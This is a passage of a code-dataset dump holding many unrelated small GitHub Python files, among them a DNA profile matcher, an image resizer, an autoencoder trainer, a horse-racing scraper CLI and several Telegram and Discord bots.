\n\n\n","repo_name":"dataloop-ai/AutoML","sub_path":"networks/retinanet/lib/nms/test_num.py","file_name":"test_num.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":337,"dataset":"github-code","pt":"60"} +{"seq_id":"4681042636","text":"import csv\n\n\ndef find_mpg(request):\n reader = csv.reader(open('transscraper/static/data/mpg.csv'),delimiter=',')\n car_data_found = False\n for row in reader:\n if (row[1].count(request.car_make) != 0):\n if (row[3].count(request.car_model) != 0):\n car_data = row\n car_data_found = True\n break\n \n if ( car_data_found == True ) :\n return car_data[11]\n else :\n return 21","repo_name":"soncodi/hackathon","sub_path":"backend/transscraper/mpg_api.py","file_name":"mpg_api.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75427526270","text":"\r\nclass Grid:\r\n \r\n def __init__(self, matrix, rows, cols, spacing=49):\r\n self.spacing = min(width/cols, height/rows)\r\n self.cols = cols\r\n self.rows = rows\r\n self.matrix = matrix\r\n \r\n \r\n \r\n def display(self):\r\n \r\n # Fill a grid on the screen, using the matrix that represents the environment as reference\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n x = j * self.spacing\r\n y = i * self.spacing \r\n \r\n # Fill the grid cell with the color of its type\r\n fill(self.matrix[i][j].color)\r\n stroke(0)\r\n rect(x, y, self.spacing, 
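image2tile above zero-pads edge tiles so every tile is exactly size x size, and tile2image crops that padding back off while reassembling. A quick round-trip check, assuming the two functions above are in scope:

```python
import numpy as np

im = np.random.randint(0, 255, size=(70, 50, 3), dtype=np.uint8)
tiles, idxs = image2tile(im, size=32)          # 3x2 grid; edge tiles zero-padded
assert all(t.shape == (32, 32, 3) for t in tiles)
out = tile2image(tiles, idxs, size=[70, 50])   # padding cropped on reassembly
assert np.array_equal(out, im)                 # lossless round trip
```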
self.spacing)\r\n","repo_name":"AlexandreKavalerski/agente-de-busca","sub_path":"utils/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40479732105","text":"import csv\nimport sys\n\n\ndef main():\n\n # TODO: Check for command-line usage\n if len(sys.argv) != 3:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n\n # TODO: Read database file into a variable\n persons = []\n # read in the first CSV file\n with open(sys.argv[1], \"r\") as database:\n reader = csv.DictReader(database)\n # get the header of the file\n DB_header = reader.fieldnames\n # file the persons list with the people\n for row in reader:\n persons.append(row)\n\n # Read DNA sequence file into a variable\n with open(sys.argv[2], \"r\") as DNA:\n DNA_data = DNA.read()\n\n # Find longest match of each STR in DNA sequence\n\n # intialize STR Name variable\n STR_name = []\n # look at each value in the DB_header\n for STR in (DB_header):\n # only want the STR sequences and append them to the\n if STR != \"name\":\n STR_name.append(STR)\n\n # make an empty dictionary with all the STR sequences and set thier value to 0\n STRS = dict.fromkeys(STR_name, 0)\n for x in STR_name:\n # set the STR sequences to the longest match\n STRS[x] = longest_match(DNA_data, x)\n\n # TODO: Check database for matching profiles\n\n # look at each person in the persons list\n for person in persons:\n # intialize sequence variable to see if person matches all STR sequences\n sequences = 0\n for str in STRS:\n # See if the str of the person matches the longest STR recoreded and add plus one to the sequences\n if int(person[str]) != STRS[str]:\n continue\n sequences += 1\n\n # if the sequences variables is the same lenght as the STR dicitonary, found match and print their name\n if (sequences == len(STRS)):\n print(person['name'])\n return\n\n # else return no match\n print(\"No Match\")\n return\n\n\ndef longest_match(sequence, subsequence):\n \"\"\"Returns length of longest run of subsequence in sequence.\"\"\"\n\n # Initialize variables\n longest_run = 0\n subsequence_length = len(subsequence)\n sequence_length = len(sequence)\n\n # Check each character in sequence for most consecutive runs of subsequence\n for i in range(sequence_length):\n\n # Initialize count of consecutive runs\n count = 0\n\n # Check for a subsequence match in a \"substring\" (a subset of characters) within sequence\n # If a match, move substring to next potential match in sequence\n # Continue moving substring and checking for matches until out of consecutive matches\n while True:\n\n # Adjust substring start and end\n start = i + count * subsequence_length\n end = start + subsequence_length\n\n # If there is a match in the substring\n if sequence[start:end] == subsequence:\n count += 1\n\n # If there is no match in the substring\n else:\n break\n\n # Update most consecutive matches found\n longest_run = max(longest_run, count)\n\n # After checking for runs at each character in seqeuence, return longest run found\n return longest_run\n\n\nmain()\n","repo_name":"JosephNeas/CS50x","sub_path":"Problem Set 6/dna/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6816391610","text":"from timeit import default_timer as timer\n\nlines = str()\nwith open('21_input.txt') as f:\n\tlines = [n.strip() for n in 
f.readlines()]\n\ndef part1(lines):\n\trecipes = []\n\tfor line in lines:\n\t\ts = line.split(' (contains')\n\t\ta = s[0].strip().split(' ')\n\t\tb = s[1].strip().split(', ')[:-1]\n\t\tnewRecipe = (a, b)\n\t\trecipes.append(newRecipe)\n\n\t\n\ndef part2(lines):\n\tpass\n\n\n\n\nstart = timer()\np1 = part1(lines)\nend = timer()\nprint(\"Part 1:\", p1)\nprint(\"Time (msec):\", (end - start) * 1000)\nprint()\n\nstart = timer()\np2 = part2(lines)\nend = timer()\nprint(\"Part 2:\", p2)\nprint(\"Time (msec):\", (end - start) * 1000)\nprint()","repo_name":"carsongmiller/AoC2020","sub_path":"Python/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11002860060","text":"from .input_reader import InputReader\n\nclass Floris():\n \"\"\"\n Floris is the highest level class of the Floris package. Import this class\n and instantiate it with a path to an input file to begin running Floris. Use\n the ``farm`` attribute to access other objects within the model.\n\n inputs:\n input_file: str - path to the json input file\n input_dict: dict - dictionary of appropriate inputs\n\n outputs:\n self: Floris - an instantiated Floris object\n \"\"\"\n\n def __init__(self, input_file=None, input_dict=None):\n self.input_reader = InputReader()\n self.input_file = input_file\n self.input_dict = input_dict\n self.farm = self.input_reader.read(input_file=self.input_file,\n input_dict=self.input_dict)\n","repo_name":"timo-verstraeten/mats-experiments","sub_path":"cpp/sim/floris/floris.py","file_name":"floris.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"21335212089","text":"num = int(input('Enter an integer: '))\r\nprint('''Choose one of the bases for conversion:\r\n [ 1 ] convert to BINARY\r\n [ 2 ] convert to OCTAL\r\n [ 3 ] convert to HEXADECIMAL''') #with triple quotes I can insert line breaks with enter and the program understands them\r\ncond = int(input('Your option: '))\r\n\r\nif cond == 1:\r\n print('{} converted to BINARY equals {}'.format(num, bin(num)[2:]))\r\nelif cond == 2:\r\n print('{} converted to OCTAL equals {}'.format(num, oct(num)[2:]))\r\nelif cond == 3:\r\n print('{} converted to HEXADECIMAL equals {}'.format(num, hex(num)[2:]))\r\nelse:\r\n print('Invalid option, try again.')\r\n\r\n#at the end of the conversion we slice the output to display it from index 2 on, removing Python's bin, oct and hex prefixes (0b = bin / 0o = oct / 0x = hex)\r\n","repo_name":"rtreale/Desafios-Curso_em_Video","sub_path":"MUNDO 02/desafio037.py","file_name":"desafio037.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8766423809","text":"import os\nimport re\nimport tkinter as tk\nfrom tkinter import filedialog, messagebox, ttk\nfrom PIL import Image, ImageTk\nfrom PIL.Image import Resampling\n\nfrom custom_dialog import CustomDialog\nfrom super_resolution import SuperResolution\n\nFILETYPES = (\n (\"JPEG files\", \"*.jpg\"),\n (\"PNG files\", \"*.png\"),\n (\"All files\", \"*.*\")\n)\n\nPLACEHOLDER_PATH = \"assets/placeholder.jpg\"\nHEIGHT_OFFSET = 70\nMODELS_DIR = \"models\"\n\nclass ImageResizer(tk.Tk):\n def __init__(self, canvas_width, canvas_height):\n super().__init__()\n self.title('Image Resizer')\n self.resizable(0, 0)\n self.canvas_width 
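The slicing trick `bin(num)[2:]` above drops Python's `0b`/`0o`/`0x` prefixes by hand; the format mini-language yields the same digits with no slicing. A quick comparison:

```python
num = 52
print(bin(num)[2:], format(num, "b"), f"{num:b}")  # 110100 110100 110100
print(oct(num)[2:], f"{num:o}")                    # 64 64
print(hex(num)[2:], f"{num:x}")                    # 34 34
```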
= canvas_width\n self.canvas_height = canvas_height\n self.center_window()\n self.setup_ui()\n\n def center_window(self):\n \"\"\" Center the window on the screen \"\"\"\n screen_width = self.winfo_screenwidth()\n screen_height = self.winfo_screenheight()\n x = int((screen_width - self.canvas_width) / 2)\n y = int((screen_height - self.canvas_height) / 2)\n self.geometry(f\"{self.canvas_width}x{self.canvas_height+HEIGHT_OFFSET}+{x}+{y}\")\n\n def setup_ui(self):\n self.setup_picture_frame()\n self.setup_controls_frame()\n\n def setup_picture_frame(self):\n # Picture frame\n self.picture_frame = ttk.Frame(self)\n self.picture_frame.grid(row=0, column=0)\n\n # Canvas\n self.canvas = tk.Canvas(\n self.picture_frame,\n width=self.canvas_width,\n height=self.canvas_height)\n self.canvas.grid(row=0, column=0)\n\n # Resolution label\n self.resolution_label = ttk.Label(\n self.picture_frame,\n text=\"Original resolution: -x-\\nResized resolution: -x-\")\n self.resolution_label.grid(row=1, column=0)\n self.set_picture(PLACEHOLDER_PATH)\n\n def setup_controls_frame(self):\n # Controls frame\n self.controls_frame = ttk.Frame(self)\n self.controls_frame.grid(row=1, column=0)\n\n # Buttons\n ttk.Button(self.controls_frame, text='Open', command=self.open_picture).grid(row=0, column=0)\n ttk.Button(self.controls_frame, text='Save', command=self.save_picture).grid(row=0, column=1)\n ttk.Button(self.controls_frame, text='Resize', command=self.resize_picture).grid(row=0, column=2)\n ttk.Button(self.controls_frame, text='Clear', command=self.clear_picture).grid(row=0, column=3)\n\n def open_picture(self):\n \"\"\" Open the picture \"\"\"\n filename = filedialog.askopenfilename(\n initialdir='images/',\n title='Select an image',\n filetypes=FILETYPES)\n\n if filename:\n self.set_picture(filename, True)\n\n def save_picture(self):\n \"\"\" Save the picture \"\"\"\n if self.original_image is None:\n messagebox.showinfo(\"Information\", \"Please open the image to resize first\")\n return\n\n if self.resized_image is None:\n messagebox.showinfo(\"Information\", \"Please resize the image first\")\n return\n\n filename = filedialog.asksaveasfilename(\n initialdir='images/', \n title='Save as...', \n filetypes=FILETYPES)\n\n if filename:\n # Save the resized_image in the given path.\n self.resized_image.save(filename)\n\n def resize_picture(self): \n \"\"\" Resize the picture \"\"\"\n if self.original_image is None:\n return\n\n # Get the size of the image object\n width, height = self.original_image.size\n\n # Show the input dialog to get new resolution and model path\n input_result = self.show_input_dialog()\n\n if input_result is not None:\n w, h, model_path = input_result\n\n print(model_path)\n\n if model_path:\n sr = SuperResolution(self.file_path)\n scale_factor = int(re.findall(r'\\d+', model_path)[0])\n\n self.resized_image = sr.upscale_image(scale_factor, model_path)\n else:\n self.resized_image = self.update_resolution(w, h)\n\n try:\n if self.resized_image is not None:\n new_width, new_height = self.resized_image.size\n self.set_picture('', pil_img=self.resized_image)\n self.resolution_label.config(text=f\"Original resolution: {width}x{height}\\nResized resolution: {new_width}x{new_height}\")\n except Exception as e:\n print(f\"Error: {e}\")\n\n def clear_picture(self):\n \"\"\" Clear the picture \"\"\"\n # Set the default placeholder image\n self.set_picture(PLACEHOLDER_PATH)\n # Update the resolution label\n self.resolution_label.config(text=\"Original resolution: -x-\\nResized resolution: -x-\")\n # 
Clear the image references\n self.original_image = None\n self.resized_image = None\n self.file_path = None\n\n def set_picture(self, file_path, cache_img=False, pil_img=None):\n \"\"\" Set the picture to the canvas \"\"\"\n if pil_img is None:\n pil_img = Image.open(file_path)\n\n if cache_img:\n # Save the image object for future reference\n self.original_image = pil_img\n self.file_path = file_path\n\n width, height = self.original_image.size\n self.resolution_label.config(text=f\"Original resolution: {width}x{height}\\nResized resolution: -x-\")\n\n # Resize the picture for canvas\n resized_img = pil_img.resize(\n (self.canvas_width, self.canvas_height),\n Resampling.LANCZOS)\n\n self.tk_image = ImageTk.PhotoImage(resized_img)\n\n # Set background image\n self.bg = self.canvas.create_image(\n 0,\n 0,\n anchor=tk.NW,\n image=self.tk_image)\n \n def update_resolution(self, new_width, new_height):\n \"\"\" Update the resolution \"\"\"\n return self.original_image.resize((new_width, new_height), Image.NEAREST)\n\n def show_input_dialog(self):\n # Define the input fields and options\n model_options = [f for f in os.listdir(MODELS_DIR) if f.endswith(\".pb\")]\n options = {\"Model Path\": model_options}\n\n # Create a CustomDialog instance\n dialog = CustomDialog(self, \"Enter new resolution and model path:\",\n fields=[(\"New Width\", 640), (\"New Height\", 480), (\"Model Path\", \"\", \"select\")],\n options=options)\n\n # Show the dialog and wait for user input\n result = dialog.show()\n\n # Return the result\n if result:\n return int(result[\"New Width\"]), int(result[\"New Height\"]), result[\"Model Path\"]\n else:\n return None\n\nif __name__ == '__main__':\n app = ImageResizer(640, 480)\n app.mainloop()","repo_name":"Hollister009/image_processing","sub_path":"lab1/image_resizer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"14266187825","text":"import matplotlib.pyplot as plt\nimport time\nimport datetime\nimport csv\n\nx=[]\ny=[]\n\nwith open('feeds.csv' , 'r') as csvfile:\n with open('newv.csv', 'w') as newfile:\n writer = csv.writer(newfile)\n plots = csv.reader(csvfile, delimiter=',')\n i=1\n for row in plots:\n if i==1:\n i=0\n continue\n tmp = row[0]\n # convert timestamp of format 2022-09-01T23:34:59+05:30 to datetime object\n # tmp = datetime.strptime(tmp, '%Y-%m-%dT%H:%M:%S%z')\n tmp = time.mktime(time.strptime(tmp, '%Y-%m-%dT%H:%M:%S%z'))\n row[0] = tmp\n i+=2\n # write this row to new csv\n print(row[0])\n if((row[0] > 1662645120.0) & (i%5==0)):\n writer.writerow(row)\n\n\n","repo_name":"Namrath02/Air-Pollution-Monitor","sub_path":"plots/nplot.py","file_name":"nplot.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15628888098","text":"import time\r\nimport torch\r\nfrom torch import nn\r\nimport torch.optim as optim\r\nimport numpy as np\r\nimport os\r\n\r\nimport variables as var\r\n\r\nclass Autoencoder(nn.Module):\r\n def __init__(self,enc_hidden,dec_hidden):\r\n \r\n super(Autoencoder,self).__init__()\r\n \r\n # encoder\r\n self.enc_list = []\r\n for i in range(1,len(enc_hidden)):\r\n self.enc_list.append(nn.Linear(enc_hidden[i-1],enc_hidden[i]))\r\n self.enc_list.append(nn.ReLU(True))\r\n self.enc_list.pop()\r\n self.enc_list = nn.ModuleList(self.enc_list)\r\n\r\n #decoder\r\n self.dec_list = []\r\n for i in 
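The CSV script above converts ISO-8601 timestamps with time.mktime(time.strptime(...)). Note that mktime interprets the struct_time in the machine's local timezone and discards the +05:30 offset that %z parsed, so the epoch value is only correct when the local zone happens to match; datetime keeps the offset. A self-contained comparison (the sample timestamp mirrors the format used in the script):

```python
from datetime import datetime

ts = "2022-09-01T23:34:59+05:30"
dt = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S%z")
print(dt.timestamp())  # offset-aware epoch seconds: 1662055499.0
```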
range(1,len(dec_hidden)):\r\n self.dec_list.append(nn.Linear(dec_hidden[i-1],dec_hidden[i]))\r\n self.dec_list.append(nn.ReLU(True))\r\n self.dec_list.pop()\r\n self.dec_list = nn.ModuleList(self.dec_list)\r\n\r\n def forward(self,x):\r\n \r\n for f in self.enc_list:\r\n x = f(x)\r\n \r\n encoding = x\r\n\r\n for f in self.dec_list:\r\n x = f(x)\r\n \r\n reconstruction = x\r\n \r\n return encoding, reconstruction\r\n\r\n\r\nclass Decoder(nn.Module):\r\n def __init__(self,dec_hidden):\r\n \r\n super(Decoder,self).__init__()\r\n \r\n #decoder\r\n self.dec_list = []\r\n for i in range(1,len(dec_hidden)):\r\n self.dec_list.append(nn.Linear(dec_hidden[i-1],dec_hidden[i]))\r\n self.dec_list.append(nn.ReLU(True))\r\n self.dec_list.pop()\r\n self.dec_list = nn.ModuleList(self.dec_list)\r\n \r\n def forward(self,x):\r\n \r\n for f in self.dec_list:\r\n x = f(x)\r\n \r\n reconstruction = x\r\n \r\n return reconstruction\r\n\r\ndef train_model(dataset,net,train_loader,val_loader,save_model=True):\r\n\r\n optimizer = optim.Adam(net.parameters(), lr = var.lr, betas=(0.5, 0.999))\r\n loss_fn = nn.SmoothL1Loss(reduction = \"none\")\r\n\r\n train_losses = []\r\n val_losses = []\r\n\r\n start = time.time()\r\n for epoch in range(1,var.n_epochs+1):\r\n #training\r\n net.train()\r\n train_batch_loss = [] \r\n for x_batch in train_loader:\r\n x_batch = x_batch.to(var.device)\r\n # Makes predictions\r\n _, x_rec = net(x_batch)\r\n # Computes loss\r\n loss = loss_fn(x_batch,x_rec).mean()\r\n # Computes gradients\r\n loss.backward()\r\n # Updates parameters\r\n optimizer.step()\r\n #zero gradient \r\n optimizer.zero_grad()\r\n # Returns the loss\r\n train_losses.append(loss.item())\r\n train_batch_loss.append(loss.item())\r\n \r\n #validation\r\n with torch.no_grad():\r\n val_batch_loss = []\r\n net.eval()\r\n for x_batch in val_loader: \r\n x_batch = x_batch.to(var.device) \r\n _, x_rec = net(x_batch.to(var.device))\r\n val_loss = loss_fn(x_batch, x_rec).mean()\r\n val_losses.append(val_loss.item())\r\n val_batch_loss.append(val_loss.item())\r\n\r\n #print progress\r\n print(\"Epoch: %d, Loss %.8f, Validation Loss %.8f\" % (epoch, np.mean(train_batch_loss), np.mean(val_batch_loss)))\r\n \r\n #early stopping\r\n if val_loss < 0.003:\r\n break\r\n\r\n end = time.time()\r\n print(\"Training time: %.8f minutes\" %((end-start)/60))\r\n\r\n model_save_file = \"saved_models/%s/\" %dataset\r\n if not os.path.exists(os.path.dirname(model_save_file)):\r\n os.makedirs(os.path.dirname(model_save_file))\r\n\r\n torch.save(\r\n {'model_state_dict': net.state_dict(),\r\n 'optimizer_state_dict': optimizer.state_dict(),\r\n 'epoch': epoch,\r\n 'loss' : loss,\r\n 'val_loss': val_loss\r\n }, \"%snet.pth\" %model_save_file)\r\n\r\n return net\r\n ","repo_name":"agoodge/APAE","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"26815621627","text":"import io\nimport os\nimport click\nimport pandas as pd\nfrom datetime import datetime\nfrom commands import schedule as commands_schedule\nfrom commands import race as commands_race\nfrom datasource.netkeiba import io as netkeiba\n\n\npd.set_option(\"display.max_columns\", None)\n\ndef main():\n cmd()\n\n@click.group()\ndef cmd():\n \"\"\"First layer sub-command group\n \"\"\"\n pass\n\n@cmd.group()\ndef schedule():\n \"\"\"Second layer sub-command group\n \"\"\"\n pass\n\n@cmd.group()\ndef race():\n \"\"\"Second layer sub-command group\n 
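The Autoencoder above takes layer-size lists for the encoder and decoder and inserts a ReLU between every pair of Linear layers (the trailing pop() removes the activation after the last layer of each stack). A minimal usage sketch with mirrored sizes, assuming the class above is in scope (the dimensions are illustrative):

```python
import torch

# encoder 784 -> 128 -> 32; decoder mirrors it back to 784
net = Autoencoder(enc_hidden=[784, 128, 32], dec_hidden=[32, 128, 784])
x = torch.randn(16, 784)                     # batch of 16 flattened inputs
encoding, reconstruction = net(x)
print(encoding.shape, reconstruction.shape)  # torch.Size([16, 32]) torch.Size([16, 784])
```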
\"\"\"\n pass\n\n@schedule.command()\n@click.option(\n \"--year\", \"-y\", type=int, default=datetime.now().year,\n help=\"Target year to get the schedule\"\n)\n@click.option(\n \"--place\", \"-p\", is_flag=True,\n help=\"\"\"\n Getting place data or not.\n If you cannot set this flag, you get only place.\n \"\"\"\n)\ndef get(year, place):\n \"\"\"Getting the schedule of JRA horse racing\n \"\"\"\n name_list = commands_schedule.get(year, place)\n print(name_list)\n return name_list\n\n@race.command()\n@click.option(\n \"--name\", \"-n\", type=str,\n help=\"Race name to get the race result\"\n)\n@click.option(\n \"--track\", \"-t\", multiple=True,\n type=click.Choice(list(netkeiba.track_list._asdict().keys())),\n help=\"\"\"\n [multiple] Track name to get the race result\n \"\"\"\n)\n@click.option(\n \"--place\", \"-p\", multiple=True,\n type=click.Choice(list(netkeiba.place_list._asdict().keys())),\n help=\"\"\"\n [multiple] Place name to get the race result\n \"\"\"\n)\n@click.option(\n \"--course-situation\", \"-cs\", multiple=True,\n type=click.Choice(list(netkeiba.course_situation_list._asdict().keys())),\n help=\"\"\"\n [multiple] Course situation to get the race result\n \"\"\"\n)\n@click.option(\n \"--race-conditions\", \"-rs\", multiple=True,\n type=click.Choice(list(netkeiba.race_conditions_list._asdict().keys())),\n help=\"\"\"\n [multiple] Race conditions to get the race result\n \"\"\"\n)\n@click.option(\n \"--horse-age\", \"-ha\", multiple=True,\n type=click.Choice(list(netkeiba.horse_age_list._asdict().keys())),\n help=\"\"\"\n [multiple] Horse age to get the race result\n \"\"\"\n)\n@click.option(\n \"--grade\", \"-g\", multiple=True,\n type=click.Choice(list(netkeiba.grade_list._asdict().keys())),\n help=\"\"\"\n [multiple] Grade to get the race result\n \"\"\"\n)\n@click.option(\n \"--distance-from\", \"-df\", type=int,\n help=\"Minimum distance to get the race result\"\n)\n@click.option(\n \"--distance-to\", \"-dt\", type=int,\n help=\"Maximum distance to get the race result\"\n)\n@click.option(\n \"--start-year\", \"-sy\", type=int, default=datetime.now().year,\n help=\"Year to start to get the race result\"\n)\n@click.option(\n \"--start-month\", \"-sm\", type=int,\n help=\"Month to start to get the race result\"\n)\n@click.option(\n \"--end-year\", \"-ey\", type=int,\n help=\"Year to end to get the race result\"\n)\n@click.option(\n \"--end-month\", \"-em\", type=int,\n help=\"Month to end to get the race result\"\n)\ndef get_result(\n name, track, place, course_situation, race_conditions, horse_age,\n grade, distance_from, distance_to,\n start_year, start_month, end_year, end_month\n):\n \"\"\"Getting the race result of JRA horse racing\n \"\"\"\n params = {\n netkeiba.url_params.PID: netkeiba.pid_list.RACE_LIST,\n netkeiba.url_params.WORD: name,\n netkeiba.url_params.TRACK: [\n eval(\"netkeiba.track_list.\" + val) for val in track\n ],\n netkeiba.url_params.PLACE: [\n eval(\"netkeiba.place_list.\" + val) for val in place\n ],\n netkeiba.url_params.COURSE_SITUATION: [\n eval(\"netkeiba.course_situation_list.\" + val)\n for val in course_situation\n ],\n netkeiba.url_params.RACE_CONDITIONS: [\n eval(\"netkeiba.race_conditions_list.\" + val)\n for val in race_conditions\n ],\n netkeiba.url_params.HORSE_AGE: [\n eval(\"netkeiba.horse_age_list.\" + val) for val in horse_age\n ],\n netkeiba.url_params.GRADE: [\n eval(\"netkeiba.grade_list.\" + val) for val in grade\n ],\n netkeiba.url_params.DISTANCE_FROM: distance_from,\n netkeiba.url_params.DISTANCE_TO: distance_to,\n 
netkeiba.url_params.START_YEAR: start_year,\n netkeiba.url_params.START_MONTH: start_month,\n netkeiba.url_params.END_YEAR: end_year,\n netkeiba.url_params.END_MONTH: end_month\n }\n results = commands_race.get_result(params)\n print(results)\n return results\n\n@race.command()\n@click.option(\n \"--name\", \"-n\", type=str,\n help=\"Target name to get the race details\"\n)\n@click.option(\n \"--year\", \"-y\", type=int, default=datetime.now().year,\n help=\"Target year to get the race details\"\n)\n@click.option(\n \"--month\", \"-m\", type=int, default=datetime.now().month,\n help=\"Target month to get the race details\"\n)\ndef get_details(name, year, month):\n \"\"\"Getting the race details of JRA horse racing\n \"\"\"\n params = {\n netkeiba.url_params.PID: netkeiba.pid_list.RACE_LIST,\n netkeiba.url_params.WORD: name,\n netkeiba.url_params.START_YEAR: year,\n netkeiba.url_params.END_YEAR: year,\n netkeiba.url_params.START_MONTH: month,\n netkeiba.url_params.END_MONTH: month\n }\n details = commands_race.get_details(params)\n print(details)\n return details\n\nif __name__ == \"__main__\":\n main()","repo_name":"YusukeKambara/japan_horse_racing","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12425929231","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import include,handler404,handler500,re_path\nfrom django.contrib import admin\nfrom . import views\n\napp_name = 'mormo'\n\nurlpatterns = [\n # /\n re_path(r'^$',views.index,name='index'),\n # /contact/\n re_path(r'^contact/$',views.contact,name='contact'),\n # /admin/\n re_path(r'^admin/', admin.site.urls),\n # /logs/\n re_path(r'^logs/',include('cmdMonitor.urls',namespace='cmdMonitor')),\n # /accounts/\n re_path(r'^accounts/', include('django.contrib.auth.urls')),\n]\n\nhandler404=views.error_404\nhandler500=views.error_500\n","repo_name":"narendra-cs/mormo","sub_path":"mormo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"70475752191","text":"from searchParties import partyLookup\nfrom searchMeta import metaLookup\n\ndef getLoyalty(party_code, congress):\n party_loyalty = partyLookup({\"id\": int(party_code)}, \"Web_Members\")\n\n try:\n party_cong_loyalty = party_loyalty[str(congress)]\n except:\n party_cong_loyalty = {\"nvotes_yea_nay\": 1, \"nvotes_abs\": 0, \"nvotes_against_party\": 0, \"nvotes_party_split\": 0}\n\n global_loyalty = metaLookup(\"Web_Members\")\n try:\n global_cong_loyalty = global_loyalty[\"loyalty_counts\"][str(congress)]\n except:\n global_cong_loyalty = {\"nvotes_yea_nay\": 1, \"nvotes_abs\": 0, \"nvotes_against_party\": 0, \"nvotes_party_split\": 0}\n\n return {\"global\": global_cong_loyalty, \"party\": party_cong_loyalty}\n\n","repo_name":"voteview/WebVoteView","sub_path":"model/loyalty.py","file_name":"loyalty.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"60"} +{"seq_id":"11219553170","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import CommandStart\nfrom aiogram.utils.deep_linking import decode_payload\n\nfrom loader import dp\nfrom states.get_name import GetName\nfrom utils.db_api.db_commands import get_all_groups, create_student, update_student_name, 
get_all_groups_pk, \\\n get_group_by_pk\n\n\n@dp.message_handler(CommandStart())\nasync def start_cmd(message: types.Message):\n deep_link = message.get_args()\n groups = await get_all_groups_pk()\n if deep_link == '':\n await message.answer('☹️ Бот доступен только студентам СКТ')\n else:\n payload = decode_payload(deep_link)\n if int(payload) in groups:\n group = await get_group_by_pk(int(payload))\n await create_student(\n telegram_id=message.from_user.id,\n username=message.from_user.username,\n group=group.group_name\n )\n await message.answer('✅Отлично!\\n\\n'\n '✍️ Теперь отправь мне свое Имя и Фамилию, как записано в журнале\\n\\n'\n '(БЕЗ номера в журнале!)')\n\n await GetName.name.set()\n\n else:\n await message.answer('⛔️ Некорректная кодировка группы.')\n\n\n@dp.message_handler(state=GetName.name)\nasync def get_student_name(message: types.Message, state: FSMContext):\n name = message.text\n await update_student_name(\n telegram_id=message.from_user.id,\n name=name\n )\n\n await state.reset_state(True)\n\n await message.answer(f'👋 Приятно познакомиться, {name.split(\" \")[0]}!\\n'\n f'🤖 Я - Бот СКТ, который поможет всем преподавателям и студентам в прохождении тестов!\\n\\n'\n f'🤔 Что делать дальше?\\n'\n f'👉 Осталось дело за малым - ждать теста. Как только преподаватель отправит новый тест, '\n f'я сразу сообщу тебе об этом!')\n","repo_name":"bichief/testing-bot","sub_path":"handlers/users/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36747819860","text":"# egg code\nimport disnake\n\nfrom disnake.ext import commands\n\nbot = commands.Bot(command_prefix='!', intents=disnake.Intents.all())\n\n@bot.event\n\nasync def on_message(message):\n\n if \"egg\" in message.content:\n\n await message.add_reaction('🥚')\n\n await bot.process_commands(message)\n\n@bot.event\n\nasync def on_ready():\n\n await bot.change_presence(activity=disnake.Activity(name='🥚', type=disnake.ActivityType.playing))\n\n print('Bot is ready')\n\nbot.run('token')\n","repo_name":"ManulCode/egg","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"971984552","text":"from asyncio import sleep\nfrom datetime import timedelta\nfrom time import time\nimport os\n\nfrom motor.motor_asyncio import AsyncIOMotorClient\nfrom pyrogram import Client, filters\nfrom pyrogram.types import Message\nfrom pyrogram.errors import FloodWait\n\napi_id = int(os.environ.get(\"API_ID\"))\napi_hash = os.environ.get(\"API_HASH\")\nsession = os.environ.get(\"String_Session\")\nchat = int(os.environ.get(\"Channel_ID\"))\noffline_mark = os.environ.get(\"Offline_Mark\")\nsend_time = int(os.environ.get(\"Send_Time\"))\nusername_time = int(os.environ.get(\"UserName_Time\"))\ntime_out = int(os.environ.get(\"Time_Out\"))\nsleep_time = int(os.environ.get(\"Sleep_Time\"))\ndb_link = os.environ.get(\"DataBase_Link\")\ndb_name = os.environ.get(\"DataBase_Name\")\n\nclient = Client(session, api_id, api_hash)\n\nmongoClient = AsyncIOMotorClient(db_link)\ndb = mongoClient[db_name][\"Bots\"]\ndb_last = mongoClient[db_name][\"Last\"]\n\nAllBots = {}\nStatus = {\"UserName\": 0, \"ID\": 0, \"Flood\": 0, \"Last\": 1}\nbot = 